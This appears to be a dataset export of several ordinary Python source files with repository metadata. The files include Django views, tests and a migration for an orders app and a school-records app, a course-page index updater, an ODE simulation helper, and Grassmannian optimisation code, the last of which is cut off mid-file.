max_stars_repo_path
stringlengths
4
286
max_stars_repo_name
stringlengths
5
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.03M
content_cleaned
stringlengths
6
1.03M
language
stringclasses
111 values
language_score
float64
0.03
1
comments
stringlengths
0
556k
edu_score
float64
0.32
5.03
edu_int_score
int64
0
5
scripts/add_to_page.py
N9199/IIC3253-2021-1
0
6623551
#!/usr/bin/python3 import os import re from datetime import datetime os.chdir(os.path.dirname(__file__)) enunciados = list(map(lambda x: int( x[9:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Enunciados")))) soluciones = list(map(lambda x: int( x[8:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Soluciones")))) enunciados.sort() soluciones.sort() assert(len(enunciados) >= len(soluciones)) with open("../index.md") as f: curr = f.read() re1 = re.compile("Enunciado\d\d\.pdf") re2 = re.compile("Solucion\d\d\.pdf") re3 = re.compile("\\\\subtitle\{.*\}") curr_enunciados = set(map(lambda x: int(x[9:-4]), re1.findall(curr))) curr_soluciones = set(map(lambda x: int(x[8:-4]), re2.findall(curr))) # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list curr = curr.split('\n') delta = [] out = [] j = 0 for i in range(len(enunciados)): while j+1 < len(soluciones) and int(enunciados[i]) > int(soluciones[j]): j += 1 if int(enunciados[i]) not in curr_enunciados: delta.append(f"Enunciado {enunciados[i]:02d}") if soluciones and int(soluciones[j]) not in curr_soluciones: delta.append(f"Solución {soluciones[j]:02d}") with open(f"../pdfs/Ayudantias/{enunciados[i]:02d}.tex") as f: temp1 = list( map(lambda x: x[10:-1], re3.findall(f.read())))[0] if soluciones and enunciados[i] == soluciones[j]: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf) - [Solución](pdfs/Soluciones/Solucion{soluciones[j]:02d}.pdf)" else: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf)" out.append(temp) curr[6] = f"Última actualización: {datetime.today().strftime('%d/%m')} ({', '.join(delta)})" curr = curr[:10]+out+curr[-3:] with open("../index.md", 'w') as f: f.write('\n'.join(curr))
#!/usr/bin/python3 import os import re from datetime import datetime os.chdir(os.path.dirname(__file__)) enunciados = list(map(lambda x: int( x[9:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Enunciados")))) soluciones = list(map(lambda x: int( x[8:-4]), filter(lambda x: x[-4:] == ".pdf", os.listdir("../pdfs/Soluciones")))) enunciados.sort() soluciones.sort() assert(len(enunciados) >= len(soluciones)) with open("../index.md") as f: curr = f.read() re1 = re.compile("Enunciado\d\d\.pdf") re2 = re.compile("Solucion\d\d\.pdf") re3 = re.compile("\\\\subtitle\{.*\}") curr_enunciados = set(map(lambda x: int(x[9:-4]), re1.findall(curr))) curr_soluciones = set(map(lambda x: int(x[8:-4]), re2.findall(curr))) # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list curr = curr.split('\n') delta = [] out = [] j = 0 for i in range(len(enunciados)): while j+1 < len(soluciones) and int(enunciados[i]) > int(soluciones[j]): j += 1 if int(enunciados[i]) not in curr_enunciados: delta.append(f"Enunciado {enunciados[i]:02d}") if soluciones and int(soluciones[j]) not in curr_soluciones: delta.append(f"Solución {soluciones[j]:02d}") with open(f"../pdfs/Ayudantias/{enunciados[i]:02d}.tex") as f: temp1 = list( map(lambda x: x[10:-1], re3.findall(f.read())))[0] if soluciones and enunciados[i] == soluciones[j]: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf) - [Solución](pdfs/Soluciones/Solucion{soluciones[j]:02d}.pdf)" else: temp = f"- Ayudantia {enunciados[i]:02d} ({temp1}) - [Enunciado](pdfs/Enunciados/Enunciado{enunciados[i]:02d}.pdf)" out.append(temp) curr[6] = f"Última actualización: {datetime.today().strftime('%d/%m')} ({', '.join(delta)})" curr = curr[:10]+out+curr[-3:] with open("../index.md", 'w') as f: f.write('\n'.join(curr))
en
0.507772
#!/usr/bin/python3 # Note: index 6 for update date, indices in [9,len(curr)-3] are for display list
2.467906
2
dof_conf/core/tests/test_views.py
DevOfFuture/dof-conf
3
6623552
<filename>dof_conf/core/tests/test_views.py from django.shortcuts import reverse from dof_conf.core.tests import TestCase class TestHome(TestCase): def test_should_render(self): url = reverse('core:home') response = self.get(url) self.assertEqual(response.status_code, 200) self.assertInContext('speakers') self.assertInContext('schedule') self.assertInContext('reservation_form') class TestReservations(TestCase): def setUp(self): self.url = reverse('core:reservations') def test_render(self): response = self.get(self.url) self.assertEqual(response.status_code, 200) self.assertInContext('form')
<filename>dof_conf/core/tests/test_views.py from django.shortcuts import reverse from dof_conf.core.tests import TestCase class TestHome(TestCase): def test_should_render(self): url = reverse('core:home') response = self.get(url) self.assertEqual(response.status_code, 200) self.assertInContext('speakers') self.assertInContext('schedule') self.assertInContext('reservation_form') class TestReservations(TestCase): def setUp(self): self.url = reverse('core:reservations') def test_render(self): response = self.get(self.url) self.assertEqual(response.status_code, 200) self.assertInContext('form')
none
1
2.250946
2
webapi/servidorapi/migrations/0001_initial.py
aecheverria40/proyectomoviles
0
6623553
<reponame>aecheverria40/proyectomoviles # Generated by Django 2.1.3 on 2018-11-13 07:02 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Alumno', fields=[ ('IdAlumno', models.CharField(max_length=100, primary_key=True, serialize=False)), ('apellidoPaternoAlumno', models.CharField(max_length=100)), ('apellidoMaternoAlumno', models.CharField(max_length=100)), ('nombreAlumno', models.CharField(max_length=100)), ('direccionAlumno', models.CharField(max_length=100)), ('telefonoAlumno', models.CharField(max_length=20)), ('emailAlumno', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='Boleta', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('perteneceAlumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Alumno')), ], ), migrations.CreateModel( name='Clase', fields=[ ('IdClase', models.CharField(max_length=100, primary_key=True, serialize=False)), ('Materia', models.CharField(max_length=100)), ('Horario', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Coordinador', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoCoordinador', models.CharField(max_length=100)), ('apellidoMaternoCoordinador', models.CharField(max_length=100)), ('nombreCoordinador', models.CharField(max_length=100)), ('direccionCoordinador', models.CharField(max_length=100)), ('telefonoCoordinador', models.CharField(max_length=20)), ('email_Coordinador', models.CharField(max_length=50)), ('IdCoordinador', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Coordinadores', 'verbose_name': 'Coordinador', }, ), migrations.CreateModel( name='Docente', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoDocente', models.CharField(max_length=100)), ('apellidoMaterno', models.CharField(max_length=100)), ('nombreDocente', models.CharField(max_length=100)), ('direccionDocente', models.CharField(max_length=100)), ('telefonoDocente', models.CharField(max_length=20)), ('emailDocente', models.CharField(max_length=50)), ('IdDocente', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Docentes', 'verbose_name': 'Docente', }, ), migrations.CreateModel( name='Escuela', fields=[ ('clave', models.CharField(max_length=100, primary_key=True, serialize=False)), ('direccion', models.CharField(max_length=100)), ('telefono', models.CharField(max_length=20)), ('director', models.CharField(max_length=100)), ('coordinador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Coordinador')), ], ), migrations.CreateModel( name='Parcial', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('calificacion', models.SmallIntegerField()), ('faltas', models.SmallIntegerField()), ('comentarios', models.CharField(max_length=100)), ('boletaPertenece', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Boleta')), ], ), migrations.AddField( model_name='docente', name='escuelas', field=models.ManyToManyField(to='servidorapi.Escuela'), ), migrations.AddField( model_name='clase', name='docenteImpartiendo', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Docente'), ), migrations.AddField( model_name='clase', name='escuelaImparte', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Escuela'), ), migrations.AddField( model_name='boleta', name='perteneceClase', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Clase'), ), migrations.AddField( model_name='alumno', name='clases', field=models.ManyToManyField(to='servidorapi.Clase'), ), ]
# Generated by Django 2.1.3 on 2018-11-13 07:02 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Alumno', fields=[ ('IdAlumno', models.CharField(max_length=100, primary_key=True, serialize=False)), ('apellidoPaternoAlumno', models.CharField(max_length=100)), ('apellidoMaternoAlumno', models.CharField(max_length=100)), ('nombreAlumno', models.CharField(max_length=100)), ('direccionAlumno', models.CharField(max_length=100)), ('telefonoAlumno', models.CharField(max_length=20)), ('emailAlumno', models.CharField(max_length=50)), ], ), migrations.CreateModel( name='Boleta', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('perteneceAlumno', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Alumno')), ], ), migrations.CreateModel( name='Clase', fields=[ ('IdClase', models.CharField(max_length=100, primary_key=True, serialize=False)), ('Materia', models.CharField(max_length=100)), ('Horario', models.CharField(max_length=100)), ], ), migrations.CreateModel( name='Coordinador', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoCoordinador', models.CharField(max_length=100)), ('apellidoMaternoCoordinador', models.CharField(max_length=100)), ('nombreCoordinador', models.CharField(max_length=100)), ('direccionCoordinador', models.CharField(max_length=100)), ('telefonoCoordinador', models.CharField(max_length=20)), ('email_Coordinador', models.CharField(max_length=50)), ('IdCoordinador', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Coordinadores', 'verbose_name': 'Coordinador', }, ), migrations.CreateModel( name='Docente', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('apellidoPaternoDocente', models.CharField(max_length=100)), ('apellidoMaterno', models.CharField(max_length=100)), ('nombreDocente', models.CharField(max_length=100)), ('direccionDocente', models.CharField(max_length=100)), ('telefonoDocente', models.CharField(max_length=20)), ('emailDocente', models.CharField(max_length=50)), ('IdDocente', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'verbose_name_plural': 'Docentes', 'verbose_name': 'Docente', }, ), migrations.CreateModel( name='Escuela', fields=[ ('clave', models.CharField(max_length=100, primary_key=True, serialize=False)), ('direccion', models.CharField(max_length=100)), ('telefono', models.CharField(max_length=20)), ('director', models.CharField(max_length=100)), ('coordinador', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Coordinador')), ], ), migrations.CreateModel( name='Parcial', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('calificacion', models.SmallIntegerField()), ('faltas', models.SmallIntegerField()), ('comentarios', models.CharField(max_length=100)), ('boletaPertenece', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Boleta')), ], ), migrations.AddField( model_name='docente', name='escuelas', field=models.ManyToManyField(to='servidorapi.Escuela'), ), migrations.AddField( model_name='clase', name='docenteImpartiendo', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Docente'), ), migrations.AddField( model_name='clase', name='escuelaImparte', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Escuela'), ), migrations.AddField( model_name='boleta', name='perteneceClase', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='servidorapi.Clase'), ), migrations.AddField( model_name='alumno', name='clases', field=models.ManyToManyField(to='servidorapi.Clase'), ), ]
en
0.738631
# Generated by Django 2.1.3 on 2018-11-13 07:02
1.715448
2
core/calculators/tests/test_order_calculator.py
stanwood/traidoo-api
3
6623554
import itertools from decimal import Decimal import pytest from core.calculators.order_calculator import OrderCalculatorMixin pytestmark = pytest.mark.django_db def test_item_price_calculation(): item = OrderCalculatorMixin.Item(amount=3, price=10, vat=20, count=2, seller=1) price_value = item.value assert price_value.netto == 3 * 10 * 2 assert price_value.brutto == 3 * 10 * 2 * 1.2 assert price_value.vat == 3 * 10 * 2 * 0.2 def test_total_calculation_error(): items = [ OrderCalculatorMixin.Item( vat=7, price=9.48, amount=1, count=1.97, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=1.79, amount=5, count=1.83, seller="biogemuse" ), ] gross = 0 items = sorted(items, key=lambda l: l.seller) for seller_id, items in itertools.groupby(items, lambda item: item.seller): gross += OrderCalculatorMixin.calculate_gross_value_of_items(items) assert float(gross) == float(Decimal("37.52")) def test_total_calculation_sort_by_vat_rate(): items = [ OrderCalculatorMixin.Item( vat=7, price=13.5, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=19, price=19.3, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=119.7, amount=1, count=1, seller="traidoo" ), ] mixin = OrderCalculatorMixin() assert mixin.calculate_gross_value_of_items(items) == Decimal("165.49")
import itertools from decimal import Decimal import pytest from core.calculators.order_calculator import OrderCalculatorMixin pytestmark = pytest.mark.django_db def test_item_price_calculation(): item = OrderCalculatorMixin.Item(amount=3, price=10, vat=20, count=2, seller=1) price_value = item.value assert price_value.netto == 3 * 10 * 2 assert price_value.brutto == 3 * 10 * 2 * 1.2 assert price_value.vat == 3 * 10 * 2 * 0.2 def test_total_calculation_error(): items = [ OrderCalculatorMixin.Item( vat=7, price=9.48, amount=1, count=1.97, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=1.79, amount=5, count=1.83, seller="biogemuse" ), ] gross = 0 items = sorted(items, key=lambda l: l.seller) for seller_id, items in itertools.groupby(items, lambda item: item.seller): gross += OrderCalculatorMixin.calculate_gross_value_of_items(items) assert float(gross) == float(Decimal("37.52")) def test_total_calculation_sort_by_vat_rate(): items = [ OrderCalculatorMixin.Item( vat=7, price=13.5, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=19, price=19.3, amount=1, count=1, seller="traidoo" ), OrderCalculatorMixin.Item( vat=7, price=119.7, amount=1, count=1, seller="traidoo" ), ] mixin = OrderCalculatorMixin() assert mixin.calculate_gross_value_of_items(items) == Decimal("165.49")
none
1
2.462162
2
orders/views.py
RohanIRathi/Product-Management-System
0
6623555
<gh_stars>0 from datetime import datetime import json from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from home.models import User from products.models import Product from .models import Order, OrderProduct # Create your views here. def get_distributor_orders(request): if request.method == 'GET': user_id = request.session.decode(request.headers['Session'])['id'] try: retailer_id = int(request.GET['retailer']) except: retailer_id = None try: distributor = User.objects.get(pk=user_id) if distributor.is_superuser and distributor.is_staff: orders = Order.objects.filter(DistributorId=distributor).order_by('-CreationDate') if retailer_id: retailer = User.objects.get(pk=retailer_id) orders = orders.filter(RetailerId=retailer) distributor_orders = [order.json() for order in orders] return JsonResponse({'success': True, 'orders': distributor_orders}, status=200) else: return JsonResponse({'success': False, 'error': 'Access Denied'}, status=403) except: return JsonResponse({'success': False, 'error': 'User Does Not Exist'}, status=400) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_retailer_orders(request): if request.method == 'GET': retailer_id = request.session.decode(request.headers['Session'])['id'] try: distributor_id = request.GET['distributor'] except: distributor_id = None orders = Order.objects.filter(RetailerId=retailer_id).order_by('-CreationDate') if distributor_id: orders = orders.filter(DistributorId=distributor_id) retailer_orders = [order.json() for order in orders] return JsonResponse({'orders': retailer_orders, 'success': True}, status=200) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_order_details(request, **kwargs): if request.method == 'GET': order_id = kwargs['order_id'] try: order = Order.objects.get(pk=order_id) return JsonResponse({'order': order.json(), 'success': True}, status=200) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Id'}, status=400) except: return JsonResponse({'success': False, 'error': 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) @csrf_exempt def add_order(request): if request.method == 'POST': data = json.loads(request.body) distributor = User.objects.get(pk=data['distributor']) retailer = User.objects.get(pk=data['retailer']) totalQuantity = data['totalQuantity'] totalAmount = data['totalAmount'] products = data['products'] product_list, products_to_update = [], [] order = Order( DistributorId=distributor, RetailerId=retailer, TotalQuantity=totalQuantity, TotalAmount=totalAmount ) try: order.save() totalAmount, totalQuantity = 0, 0 for orderproduct in products: product = Product.objects.get(pk=orderproduct['product']) if product.Quantity < orderproduct['quantity']: raise Exception('Insufficient Quantity') order_product = OrderProduct( Order=order, Product=product, Discount=orderproduct['discount'], Quantity=orderproduct['quantity'] ) totalAmount = float(totalAmount) + float((float(product.Price) - (float(product.Price) * float(order_product.Discount) * 0.01)) * float(order_product.Quantity)) totalQuantity = float(totalQuantity) + float(order_product.Quantity) product.Quantity -= order_product.Quantity products_to_update.append(product) product_list.append(order_product) order.TotalAmount = totalAmount order.TotalQuantity = totalQuantity if float(retailer.PendingAmount) + float(order.TotalAmount) > float(retailer.CreditLimit): raise Exception('Insufficient Credit Limit') retailer.PendingAmount = float(retailer.PendingAmount) + float(order.TotalAmount) OrderProduct.objects.bulk_create(product_list) order.save() retailer.save() for product in products_to_update: product.save() return JsonResponse({'success': True, 'created order': order.json()}, status=200) except Exception as e: order.delete() return JsonResponse({'success': False, 'error': str(e) or 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def order_paid(request): order_id = int(request.GET['order']) session = request.session.decode(request.headers['Session']) user_id = session['id'] try: distributor = User.objects.get(pk=user_id) if not distributor.is_superuser or not distributor.is_staff: raise User.DoesNotExist() order = Order.objects.get(pk=order_id) if order.DistributorId != distributor: raise Order.DoesNotExist() order.PaymentDate = datetime.now() order.save() return JsonResponse({'success': True, 'message': 'Order marked as paid'}, status=200) except User.DoesNotExist: return JsonResponse({'success': False, 'error': 'Action Unauthoriezd'}, status=403) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Selected'}, status=404)
from datetime import datetime import json from django.http import JsonResponse from django.views.decorators.csrf import csrf_exempt from home.models import User from products.models import Product from .models import Order, OrderProduct # Create your views here. def get_distributor_orders(request): if request.method == 'GET': user_id = request.session.decode(request.headers['Session'])['id'] try: retailer_id = int(request.GET['retailer']) except: retailer_id = None try: distributor = User.objects.get(pk=user_id) if distributor.is_superuser and distributor.is_staff: orders = Order.objects.filter(DistributorId=distributor).order_by('-CreationDate') if retailer_id: retailer = User.objects.get(pk=retailer_id) orders = orders.filter(RetailerId=retailer) distributor_orders = [order.json() for order in orders] return JsonResponse({'success': True, 'orders': distributor_orders}, status=200) else: return JsonResponse({'success': False, 'error': 'Access Denied'}, status=403) except: return JsonResponse({'success': False, 'error': 'User Does Not Exist'}, status=400) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_retailer_orders(request): if request.method == 'GET': retailer_id = request.session.decode(request.headers['Session'])['id'] try: distributor_id = request.GET['distributor'] except: distributor_id = None orders = Order.objects.filter(RetailerId=retailer_id).order_by('-CreationDate') if distributor_id: orders = orders.filter(DistributorId=distributor_id) retailer_orders = [order.json() for order in orders] return JsonResponse({'orders': retailer_orders, 'success': True}, status=200) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def get_order_details(request, **kwargs): if request.method == 'GET': order_id = kwargs['order_id'] try: order = Order.objects.get(pk=order_id) return JsonResponse({'order': order.json(), 'success': True}, status=200) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Id'}, status=400) except: return JsonResponse({'success': False, 'error': 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) @csrf_exempt def add_order(request): if request.method == 'POST': data = json.loads(request.body) distributor = User.objects.get(pk=data['distributor']) retailer = User.objects.get(pk=data['retailer']) totalQuantity = data['totalQuantity'] totalAmount = data['totalAmount'] products = data['products'] product_list, products_to_update = [], [] order = Order( DistributorId=distributor, RetailerId=retailer, TotalQuantity=totalQuantity, TotalAmount=totalAmount ) try: order.save() totalAmount, totalQuantity = 0, 0 for orderproduct in products: product = Product.objects.get(pk=orderproduct['product']) if product.Quantity < orderproduct['quantity']: raise Exception('Insufficient Quantity') order_product = OrderProduct( Order=order, Product=product, Discount=orderproduct['discount'], Quantity=orderproduct['quantity'] ) totalAmount = float(totalAmount) + float((float(product.Price) - (float(product.Price) * float(order_product.Discount) * 0.01)) * float(order_product.Quantity)) totalQuantity = float(totalQuantity) + float(order_product.Quantity) product.Quantity -= order_product.Quantity products_to_update.append(product) product_list.append(order_product) order.TotalAmount = totalAmount order.TotalQuantity = totalQuantity if float(retailer.PendingAmount) + float(order.TotalAmount) > float(retailer.CreditLimit): raise Exception('Insufficient Credit Limit') retailer.PendingAmount = float(retailer.PendingAmount) + float(order.TotalAmount) OrderProduct.objects.bulk_create(product_list) order.save() retailer.save() for product in products_to_update: product.save() return JsonResponse({'success': True, 'created order': order.json()}, status=200) except Exception as e: order.delete() return JsonResponse({'success': False, 'error': str(e) or 'Something Went Wrong'}, status=500) return JsonResponse({'success': False, 'error': 'Method Not Allowed'}, status=405) def order_paid(request): order_id = int(request.GET['order']) session = request.session.decode(request.headers['Session']) user_id = session['id'] try: distributor = User.objects.get(pk=user_id) if not distributor.is_superuser or not distributor.is_staff: raise User.DoesNotExist() order = Order.objects.get(pk=order_id) if order.DistributorId != distributor: raise Order.DoesNotExist() order.PaymentDate = datetime.now() order.save() return JsonResponse({'success': True, 'message': 'Order marked as paid'}, status=200) except User.DoesNotExist: return JsonResponse({'success': False, 'error': 'Action Unauthoriezd'}, status=403) except Order.DoesNotExist: return JsonResponse({'success': False, 'error': 'Invalid Order Selected'}, status=404)
en
0.968116
# Create your views here.
2.074186
2
replica/core.py
TimeWz667/replica
0
6623556
import numpy as np import pandas as pd from scipy.integrate import solve_ivp import os import json from numba import njit __author__ = '<NAME>' __all__ = ['Parameters', 'trm2dy', 'simulate', 'output_posterior'] @njit def trm2dy(trm, y): dy = np.zeros_like(y) ns = len(y) for src in range(ns): for tar in range(ns): flow = y[src] * trm[src, tar] dy[src] -= flow dy[tar] += flow return dy class Parameters: def __init__(self, pars, transformed): self.Pars = pars self.Transformed = transformed def __getitem__(self, item): try: return self.Pars[item] except KeyError: return self.Transformed[item] def list_variables(self): return list(self.Pars.keys()) + list(self.Transformed.keys()) def to_json(self): return dict(self.Pars) def simulate(model, pars, y0, t_out, t_warmup=200, dfe=None): times = np.array(t_out) time0 = min(times) ys_wp = solve_ivp(model, [time0 - t_warmup, time0], y0, args=(pars, ), events=dfe, method="RK23") if len(ys_wp.t_events[0]) > 0 or not ys_wp.success: return None, None, {'succ': False, 'res': 'DFE reached'} y0 = ys_wp.y[:, -1] ys = solve_ivp(model, [time0, max(times)], y0, args=(pars,), events=dfe, dense_output=True) if len(ys.t_events[0]) > 0 or not ys.success: return None, None, {'succ': False, 'res': 'DFE reached'} ms = pd.DataFrame([model.measure(t, ys.sol(t), pars) for t in times]) ms = ms.set_index('Time') msg = {'succ': True} return ys, ms, msg def output_posterior(post, out_path): if not os.path.exists(out_path): os.makedirs(out_path) with open(out_path + '/post.json', 'w') as f: json.dump(post.to_json()['Posterior'], f) post.DF.to_csv(out_path + '/post.csv') # post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
import numpy as np import pandas as pd from scipy.integrate import solve_ivp import os import json from numba import njit __author__ = '<NAME>' __all__ = ['Parameters', 'trm2dy', 'simulate', 'output_posterior'] @njit def trm2dy(trm, y): dy = np.zeros_like(y) ns = len(y) for src in range(ns): for tar in range(ns): flow = y[src] * trm[src, tar] dy[src] -= flow dy[tar] += flow return dy class Parameters: def __init__(self, pars, transformed): self.Pars = pars self.Transformed = transformed def __getitem__(self, item): try: return self.Pars[item] except KeyError: return self.Transformed[item] def list_variables(self): return list(self.Pars.keys()) + list(self.Transformed.keys()) def to_json(self): return dict(self.Pars) def simulate(model, pars, y0, t_out, t_warmup=200, dfe=None): times = np.array(t_out) time0 = min(times) ys_wp = solve_ivp(model, [time0 - t_warmup, time0], y0, args=(pars, ), events=dfe, method="RK23") if len(ys_wp.t_events[0]) > 0 or not ys_wp.success: return None, None, {'succ': False, 'res': 'DFE reached'} y0 = ys_wp.y[:, -1] ys = solve_ivp(model, [time0, max(times)], y0, args=(pars,), events=dfe, dense_output=True) if len(ys.t_events[0]) > 0 or not ys.success: return None, None, {'succ': False, 'res': 'DFE reached'} ms = pd.DataFrame([model.measure(t, ys.sol(t), pars) for t in times]) ms = ms.set_index('Time') msg = {'succ': True} return ys, ms, msg def output_posterior(post, out_path): if not os.path.exists(out_path): os.makedirs(out_path) with open(out_path + '/post.json', 'w') as f: json.dump(post.to_json()['Posterior'], f) post.DF.to_csv(out_path + '/post.csv') # post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
en
0.230896
# post.Message['Trace'].to_csv(out_path + '/post_trace.csv')
2.253931
2
grslra/spaces.py
clemenshage/grslra
0
6623557
<gh_stars>0 from abc import ABCMeta, abstractmethod import numpy as np from tools import msin, mcos class SpaceMeta: __metaclass__ = ABCMeta @abstractmethod def get_G(self, grad, X): # this function returns the projected gradient pass @abstractmethod def get_H(self, G, gamma, tauH): # this function computes the search direction from the current projected gradient and the past search direction pass @abstractmethod def update_variable(self, X, H, t): # this function updates the variable using the search direction and the step size pass @abstractmethod def transport(self, Eta, X, H, t): # this function transports an element along H into the tangent space at distance t pass class Euclidean(SpaceMeta): def __init__(self): pass def get_G(self, grad, X): return grad def get_H(self, G, gamma, tauH): H = -G + gamma * tauH return H def update_variable(self, X, H, t): return X + t * H def transport(self, Eta, X, H, t): return Eta class GrassmannianSVD(SpaceMeta): # see Edelman et al. def __init__(self, m, k): self.U_H = np.zeros((m, k)) self.Sigma_H = np.zeros((k, k)) self.V_H = np.zeros((k, k)) def get_G(self, grad, X): G = grad - np.dot(X, np.dot(X.T, grad)) return G def get_H(self, G, gamma, tauH): H = -G + gamma * tauH try: self.U_H, sigmas_H, V_H_T = np.linalg.svd(H, full_matrices=False) self.Sigma_H[:, :] = np.diag(sigmas_H) self.V_H = V_H_T.T except: print "Problem is badly conditioned. Aborting..." exit() return H def update_variable(self, X, H, t): X_t = np.dot(np.dot(X, np.dot(self.V_H, mcos(self.Sigma_H * t))) + np.dot(self.U_H, msin(self.Sigma_H * t)), self.V_H.T) return X_t def transport(self, Eta, X, H, t): tauEta = Eta - np.dot(np.dot(np.dot(X, self.V_H), msin(self.Sigma_H * t)) + np.dot(self.U_H, (np.eye(X.shape[1]) - mcos(self.Sigma_H * t))), np.dot(self.U_H.T, Eta)) return tauEta class GrassmannianSVDrank1(SpaceMeta): # see GROUSE method by Balzano et al. def __init__(self, m, k): self.u_H = np.zeros((m,)) self.alpha = 0 self.sigma_H = 0 self.v_H = np.zeros((k,)) self.beta = 0 def get_G(self, grad, X): G = (grad[0] - np.dot(X, np.dot(X.T, grad[0])), grad[1]) return G def get_H(self, G, gamma, tauH): H = (-G[0], G[1]) self.u_H = H[0] / np.linalg.norm(H[0]) self.v_H = H[1] / np.linalg.norm(H[1]) self.sigma_H = np.linalg.norm(H[0]) * np.linalg.norm(H[1]) return H def update_variable(self, X, H, t): X_t = X + np.outer((np.cos(self.sigma_H * t) - 1) * np.dot(X, self.v_H) + np.sin(self.sigma_H * t) * self.u_H, self.v_H) return X_t def transport(self, Eta, X, H, t): pass
from abc import ABCMeta, abstractmethod import numpy as np from tools import msin, mcos class SpaceMeta: __metaclass__ = ABCMeta @abstractmethod def get_G(self, grad, X): # this function returns the projected gradient pass @abstractmethod def get_H(self, G, gamma, tauH): # this function computes the search direction from the current projected gradient and the past search direction pass @abstractmethod def update_variable(self, X, H, t): # this function updates the variable using the search direction and the step size pass @abstractmethod def transport(self, Eta, X, H, t): # this function transports an element along H into the tangent space at distance t pass class Euclidean(SpaceMeta): def __init__(self): pass def get_G(self, grad, X): return grad def get_H(self, G, gamma, tauH): H = -G + gamma * tauH return H def update_variable(self, X, H, t): return X + t * H def transport(self, Eta, X, H, t): return Eta class GrassmannianSVD(SpaceMeta): # see Edelman et al. def __init__(self, m, k): self.U_H = np.zeros((m, k)) self.Sigma_H = np.zeros((k, k)) self.V_H = np.zeros((k, k)) def get_G(self, grad, X): G = grad - np.dot(X, np.dot(X.T, grad)) return G def get_H(self, G, gamma, tauH): H = -G + gamma * tauH try: self.U_H, sigmas_H, V_H_T = np.linalg.svd(H, full_matrices=False) self.Sigma_H[:, :] = np.diag(sigmas_H) self.V_H = V_H_T.T except: print "Problem is badly conditioned. Aborting..." exit() return H def update_variable(self, X, H, t): X_t = np.dot(np.dot(X, np.dot(self.V_H, mcos(self.Sigma_H * t))) + np.dot(self.U_H, 